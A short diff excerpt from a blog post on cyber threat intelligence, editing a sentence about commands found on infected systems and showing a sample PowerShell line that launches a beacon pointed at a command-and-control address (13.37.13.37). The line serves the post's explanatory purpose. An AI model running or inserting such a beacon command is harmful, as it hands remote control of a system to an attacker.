lnfernux/lnfernux.github.io/_posts/2025-01-26-Expanding-on-CTI.md

 I ----> |command and control traffic| Be
 ```

-The team was also able to find some of the commands that were run on the infected systems:
+The team was also able to find some of the commands that were run on the infected systems.

 ```powershell
 beacon.exe -c2 13.37.13.37